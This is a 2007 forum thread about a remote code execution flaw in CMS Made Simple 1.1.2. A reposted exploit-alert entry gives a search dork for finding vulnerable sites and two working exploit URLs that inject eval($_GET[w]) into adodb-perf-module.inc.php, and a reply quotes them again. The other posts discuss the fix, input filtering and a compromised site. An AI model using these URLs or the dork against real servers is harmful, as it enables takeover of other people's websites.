I ran across this today..
I saw the version in the title...
it's probably old, and already taken care of, but I thought I'd post it here just in case.
John
http://securityreason.com/exploitalert/2811
Topic : CMS Made Simple 1.2 Remote Code Execution Vulnerability
ExploitAlert : 2811
Credit : irk4z
Date : 24.9.2007
Download
Exploit Code :
# o [bug]
/"*._ _ #
# . . . .-*'`
`*-.._.-'/ #
# o o < * )) ,
( #
# . o
`*-._`._(__.--*"`.\ #
#
#
# vuln.: CMS Made Simple 1.1.2 Remote Code Execution
Vulnerability #
# author: irk4z@yahoo.pl
#
# download:
#
#
http://dev.cmsmadesimple.org/frs/downlo ... adesimple-
1.1.2.zip #
# dork: "powered by CMS Made Simple version 1.1.2"
#
# greetz: cOndemned, kacper, str0ke
#
# code:
/lib/adodb_lite/adodb-perf-module.inc.php:
...
eval('class perfmon_parent_EXTENDER extends ' . $last_module .
'_ADOConnection { }');
...
# exploit:
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?la
st_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnec
tion{}//&w=phpinfo();
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?la
st_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnec
tion{}//&w=[ PHPCODE ]
CMS Made Simple 1.2 Remote Code Execution Vulnerability
- johnbmcdonald
- Forum Members
- Posts: 60
- Joined: Mon May 14, 2007 8:01 pm
CMS Made Simple 1.2 Remote Code Execution Vulnerability
Last edited by johnbmcdonald on Tue Oct 30, 2007 10:30 pm, edited 1 time in total.
Re: CMS Made Simple 1.2 Remote Code Execution Vulnerability
Hello John,
thank you for reporting this.
Pierre M.
thank you for reporting this.
Filter people, filter against []//(){} and such in the HTTP requests before they reach PHP whatever version of CMSms.johnbmcdonald wrote: # exploit:
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?la
st_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnec
tion{}//&w=phpinfo();
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?la
st_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnec
tion{}//&w=[ PHPCODE ]
Pierre M.
Re: CMS Made Simple 1.2 Remote Code Execution Vulnerability
I believe this is only with version 1.1.2 if I can read correct ?
this is from the link:
"CMS Made Simple 1.1.2 Remote Code Execution
Vulnerability"
this is from the link:
"CMS Made Simple 1.1.2 Remote Code Execution
Vulnerability"
- johnbmcdonald
- Forum Members
- Posts: 60
- Joined: Mon May 14, 2007 8:01 pm
Re: CMS Made Simple 1.2 Remote Code Execution Vulnerability
I saw the 1.1.2 as well, but I went ahead and posted it because of the version in the title. I figured its better safe than sorry..
John
John
-
- Support Guru
- Posts: 8169
- Joined: Tue Oct 19, 2004 6:44 pm
Re: CMS Made Simple 1.2 Remote Code Execution Vulnerability
Those vulnerabilities were fixed in 1.1.4.1
Follow me on twitter
Please post system information from "Extensions >> System Information" (there is a bbcode option) on all posts asking for assistance.
--------------------
If you can't bother explaining your problem well, you shouldn't expect much in the way of assistance.
Please post system information from "Extensions >> System Information" (there is a bbcode option) on all posts asking for assistance.
--------------------
If you can't bother explaining your problem well, you shouldn't expect much in the way of assistance.
Re: CMS Made Simple 1.2 Remote Code Execution Vulnerability
I like John's "better safe than sorry". It is unsafe to "not check" if the exploit has gone or not.
Moreover it is compatible with my "better filtered than not". Filter, people, filter
Of course, thanks to the dev team to have responded and fixed the issue.
Pierre M.
Moreover it is compatible with my "better filtered than not". Filter, people, filter

Of course, thanks to the dev team to have responded and fixed the issue.
Pierre M.
Re: CMS Made Simple 1.2 Remote Code Execution Vulnerability
Well, I just had my site shut down by my host because of this same exploit. (apparently)
I'm here looking for a way to close the access--whatever it is. Certainly not my area of expertise. I'm running CMSMS 1.2 and according to my hosting company, the script that was exploited was adodb-perf-module.inc.php
I'm asking for more details from them so I can protect my site properly—and continue to use the submission form I had.
I see a suggestion here that input be filtered, but I'm not sure exactly where and how I would implement such a filter. Anyone care to share some suggestions on this?
thanks...
I'm here looking for a way to close the access--whatever it is. Certainly not my area of expertise. I'm running CMSMS 1.2 and according to my hosting company, the script that was exploited was adodb-perf-module.inc.php
I'm asking for more details from them so I can protect my site properly—and continue to use the submission form I had.
I see a suggestion here that input be filtered, but I'm not sure exactly where and how I would implement such a filter. Anyone care to share some suggestions on this?
thanks...
Re: CMS Made Simple 1.2 Remote Code Execution Vulnerability
Well, I found what I needed...great thread on using the .htaccess file to keep things clean.
http://forum.cmsmadesimple.org/index.ph ... 45.15.html
thanks...
http://forum.cmsmadesimple.org/index.ph ... 45.15.html
thanks...
Re: CMS Made Simple 1.2 Remote Code Execution Vulnerability
eternity (n); 1. infinite time, 2. a seemingly long or endless time, 3. the length of time it takes a frozen pizza to cook when you're starving.
4,930,000,000 (n); 1. a very large number, 2. the approximate world population in 1986 when Microsoft Corp issued its IPO. 3. Microsoft's net profit (USD) for the quarter (3 months) ending 31 March 2007.
CMSMS migration and setup services | Hosting with CMSMS installed and ready to go | PM me for Info
4,930,000,000 (n); 1. a very large number, 2. the approximate world population in 1986 when Microsoft Corp issued its IPO. 3. Microsoft's net profit (USD) for the quarter (3 months) ending 31 March 2007.
CMSMS migration and setup services | Hosting with CMSMS installed and ready to go | PM me for Info
Re: CMS Made Simple 1.2 Remote Code Execution Vulnerability
Well done kermit ! Thank you.kermit wrote: URL Filtering added to the wiki:
This is how the documentation improves. And security too.
Pierre